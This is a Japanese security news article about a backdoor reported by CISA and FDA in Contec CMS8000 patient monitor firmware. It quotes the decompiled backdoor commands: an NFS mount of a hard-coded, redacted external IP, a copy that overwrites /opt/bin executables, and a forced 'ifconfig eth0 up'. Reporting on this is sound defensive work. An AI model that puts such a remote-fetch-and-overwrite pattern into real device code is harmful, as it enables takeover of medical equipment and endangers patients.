コンテック・メディカル・システムズが提供するContec CMS8000の患者モニターにバックドア機能が存在

セキュリティニュース

投稿日時: 更新日時:

コンテック・メディカル・システムズが提供するContec CMS8000の患者モニターにバックドア機能が存在

コンテック・メディカル・システムズ(康泰医学系统有限公司)が提供するContec CMS8000の患者モニターにバックドア機能が存在する事を発見されました。

現在、バックドアを削除するデバイス用のパッチは提供されておらず、アメリカのCISA はすべての医療機関に対し、可能であればこれらのデバイスをネットワークから切断することを推奨しています。

コンテック・メディカル・システムズについて

Contec Medical Systems Co., Ltd.(康泰医学系统有限公司)は、中国に本社を構える医療機器メーカーであり、世界各国の病院や診療所、在宅医療市場向けに医療デバイスを製造・販売しています。主な製品には、患者モニター、パルスオキシメーター、ECGモニター、超音波診断装置などがあります。

なお、Contec CMS8000は、中国国内だけでなく、米国、欧州、日本などの病院や医療機関で使用されている患者モニターの一つです。

バックドアの概要

CISAの調査によると、Contec CMS8000のファームウェアには、特定のIPアドレスへ自動的に接続する隠れた機能が存在していました。

またFDAの勧告では、Contec CMS8000 デバイスとして再ラベルされた Epsimed MN-120 患者モニターにもバックドアが見つかったことも確認されました。

通常、医療機器のファームウェアアップデートは、コード署名やチェックサム検証などのセキュリティ機構が備わっているのが一般的です。

しかし、Contec CMS8000にはこのような機構が一切なく、リモートファイルの内容をそのままデバイスに適用してしまうため、攻撃者による完全なデバイス制御が可能になります。

バックドアのコード 解説

local_14 = write_cmd("mount -o nolock -t nfs XXX.XXX.X.XXX:/pm /mnt");
  • “XXX.XXX.X.XXX” はハードコードされた外部IP(大学のサーバー)
  • “mount -o nolock -t nfs” コマンドにより、リモートファイル共有をマウント
  • “/pm” ディレクトリのファイルを “/mnt” にマウントし、ローカルシステムにアクセス可能な状態を作成

このバックドアは、NFS(Network File System)を利用してリモートから任意のファイルをダウンロードし、デバイス内の重要な実行ファイルを上書きする仕組みを持っています。

local_14 = write_cmd("cp -rf /mnt/* /opt/bin");
  • リモートNFSサーバーの “/mnt” 内のすべてのファイルを “/opt/bin” にコピー
  • “/opt/bin” にある実行ファイルを上書きし、不正なコードを実行可能な状態にする

    さらに、リモートコード実行を可能にするため、以下のコマンドを実行してネットワークインターフェースを強制的に有効化します。

    write_cmd("ifconfig eth0 up");

    “eth0” インターフェースを有効化し、リモート通信を可能にする
    これにより、たとえデバイスのネットワークが無効化されていても、バックドアが機能する可能性があります。

    情報送信先のIPは中国の大学や別の中国の医療機器メーカーへ送信か

    バックドアに記載されていた接続先のIPアドレスは医療機器メーカーや医療機関ではなく、第三者機関(大学)に登録されたものですが、別の複数のメディアの調査では中国の大学に関連するIPアドレスであることが指摘されています。

    またこのIPアドレスはContec CMS8000以外の別の中国医療機器のメーカーの医療機器のソフトウェアにもハードコードで記述されています。